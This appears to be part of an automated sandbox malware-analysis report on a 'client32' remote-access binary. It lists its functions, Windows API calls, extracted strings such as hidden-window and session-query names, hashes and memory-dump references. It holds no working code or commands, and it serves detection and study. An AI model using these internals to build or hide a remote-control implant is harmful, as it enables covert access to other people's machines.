                                                                                                • Opcode ID: 422699e0a365d454feb18a1044db064c9975ade55bdae4d095fce5f32d322e63
                                                                                                • Instruction ID: 1acd1a6b45538e3765f48006b2e70f57a4b97bfd4f5723c9d8f13e57f2733eca
                                                                                                • Opcode Fuzzy Hash: 422699e0a365d454feb18a1044db064c9975ade55bdae4d095fce5f32d322e63
                                                                                                • Instruction Fuzzy Hash: 7341E7F9D0464166EF00DB70BD41B6F3298AF0134DF14D034EA0697641F766EA6AC7E2
                                                                                                Function 69D1C34D Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • UnDecorator::getBasicDataType.LIBCMT ref: 69D1C388
                                                                                                • DName::operator=.LIBCMT ref: 69D1C39C
                                                                                                • DName::operator+=.LIBCMT ref: 69D1C3AA
                                                                                                • UnDecorator::getPtrRefType.LIBCMT ref: 69D1C3D6
                                                                                                • UnDecorator::getDataIndirectType.LIBCMT ref: 69D1C453
                                                                                                • UnDecorator::getBasicDataType.LIBCMT ref: 69D1C45C
                                                                                                • operator+.LIBCMT ref: 69D1C4EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                                • String ID: std::nullptr_t$volatile
                                                                                                • API String ID: 2203807771-3726895890
                                                                                                • Opcode ID: 29fbc4838fd38aed7efb934a740ceac6b4ba3a4ae5ee2752611af0fb32388543
                                                                                                • Instruction ID: 8688323ad6c3a4fb420bdfd329d39b44150852820e67499c395223491e2a94bb
                                                                                                • Opcode Fuzzy Hash: 29fbc4838fd38aed7efb934a740ceac6b4ba3a4ae5ee2752611af0fb32388543
                                                                                                • Instruction Fuzzy Hash: 9A41CD3384C149EBDF01CFB8E841ABD7B78FB06344F408075EA59AB955C731A642CB65
                                                                                                Function 69CEC120 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 69CEC158
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69CEC1A2
                                                                                                • _free.LIBCMT ref: 69CEC1E8
                                                                                                • _free.LIBCMT ref: 69CEC21C
                                                                                                  • Part of subcall function 69CE5060: _free.LIBCMT ref: 69CE506A
                                                                                                  • Part of subcall function 69CE5060: _malloc.LIBCMT ref: 69CE5090
                                                                                                  • Part of subcall function 69CF7D00: __vswprintf.LIBCMT ref: 69CF7D26
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$FROM=%I64u$MAX=%d$ORO=%s$ORU=%s$TO=%I64u
                                                                                                • API String ID: 3180605519-2647812726
                                                                                                • Opcode ID: c762549524f5ba707b953130edffc3622f8ea2b99d76343c542a20da8d5cde8e
                                                                                                • Instruction ID: f3bc378d87d3f327fd07f4bada27d67410e73f2e9959a31fac142c535b3ea53b
                                                                                                • Opcode Fuzzy Hash: c762549524f5ba707b953130edffc3622f8ea2b99d76343c542a20da8d5cde8e
                                                                                                • Instruction Fuzzy Hash: 9541ADB95002047BEB02DF61EC84F7B77ACAF05618F40D018FC2A97A45FB35E9059AB1
                                                                                                Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                • GetDC.USER32(?), ref: 11025085
                                                                                                • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                • SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                                • String ID:
                                                                                                • API String ID: 4100900918-3916222277
                                                                                                • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                                • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                                • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                                • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                                Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 1101F0FE
                                                                                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                                  • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                                  • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                                • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                                • _memset.LIBCMT ref: 1101F1CF
                                                                                                • GetMenuItemInfoA.USER32 ref: 1101F20C
                                                                                                • __strdup.LIBCMT ref: 1101F221
                                                                                                • SetMenuItemInfoA.USER32 ref: 1101F279
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                                • String ID: 0$MakeOwnerDraw
                                                                                                • API String ID: 1249465458-1190305232
                                                                                                • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                                • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                                • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                                • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                                Function 69D00970 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 69D009A6
                                                                                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 69D009C3
                                                                                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 69D009CD
                                                                                                • GetProcAddress.KERNEL32(00000000,socket), ref: 69D009DB
                                                                                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 69D009E9
                                                                                                • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 69D009F7
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 69D00A6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                • API String ID: 2449869053-2279908372
                                                                                                • Opcode ID: 75b62b205d1ae481ec6c6422bcb8fbd828c8f842d4d13c63c1344cc93f91a523
                                                                                                • Instruction ID: 664f504497cd8b4158195989bd6b3aa3471ff5d61ed171537486c9196dfd83d9
                                                                                                • Opcode Fuzzy Hash: 75b62b205d1ae481ec6c6422bcb8fbd828c8f842d4d13c63c1344cc93f91a523
                                                                                                • Instruction Fuzzy Hash: DD318471B01218ABEB149F74CD59FEEB7B8EF86714F0041A9FA09A7280DA705E45CF91
                                                                                                Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 11131457
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastShowWindow
                                                                                                • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                • API String ID: 3252650109-4091810678
                                                                                                • Opcode ID: 087aa81ea763b872e44e1da826959f3d6e4a579116f4b694f75f8a4ea183d17b
                                                                                                • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                                • Opcode Fuzzy Hash: 087aa81ea763b872e44e1da826959f3d6e4a579116f4b694f75f8a4ea183d17b
                                                                                                • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                                Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110F732D
                                                                                                • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7372
                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0), ref: 110F73C3
                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                                • GetProcAddress.KERNEL32(?,WTSFreeMemory,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F73FD
                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                                • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                • API String ID: 2188719708-2019804778
                                                                                                • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                                • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                                Function 69CE6190 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                • __wcstoui64.LIBCMT ref: 69CE622B
                                                                                                • EnterCriticalSection.KERNEL32(69D2B898,-000397EB,?,?,69CF2C4D), ref: 69CE62AF
                                                                                                • _strncpy.LIBCMT ref: 69CE62E5
                                                                                                • _free.LIBCMT ref: 69CE62FB
                                                                                                • LeaveCriticalSection.KERNEL32(69D2B898,?,?,?,?,?,?,?,?,?,69CF2C4D), ref: 69CE631D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection_strncpy$EnterLeave__wcstoui64_free_memset
                                                                                                • String ID: 1.0$CLIENT_NAME$CONNECTION_ID$FAILED_REASON$PROTOCOL_VER$RESULT$SERVER_VERSION
                                                                                                • API String ID: 2226502904-1282845728
                                                                                                • Opcode ID: afae681e7b361fdb9c80db75d552df75547f1281fb0a007b6b035cd9b88f2f93
                                                                                                • Instruction ID: 40cbe1402197b1d478f1441846b5c085318929457b2785f46284a68f70f94ae0
                                                                                                • Opcode Fuzzy Hash: afae681e7b361fdb9c80db75d552df75547f1281fb0a007b6b035cd9b88f2f93
                                                                                                • Instruction Fuzzy Hash: C14111F9D006016BDF10DF64EC80AAE7B74EF51248F10D175EA0A9B641F335DA5687E2
                                                                                                Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                                  • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                                  • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                                • wsprintfA.USER32 ref: 1103F5D1
                                                                                                • GetSystemMenu.USER32 ref: 1103F5F6
                                                                                                • EnableMenuItem.USER32 ref: 1103F604
                                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                                • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                                • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 1300213680-78349004
                                                                                                • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                                • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                                • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                                • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                                Function 69CF7E60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
                                                                                                • String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
                                                                                                • API String ID: 3275914093-1155488092
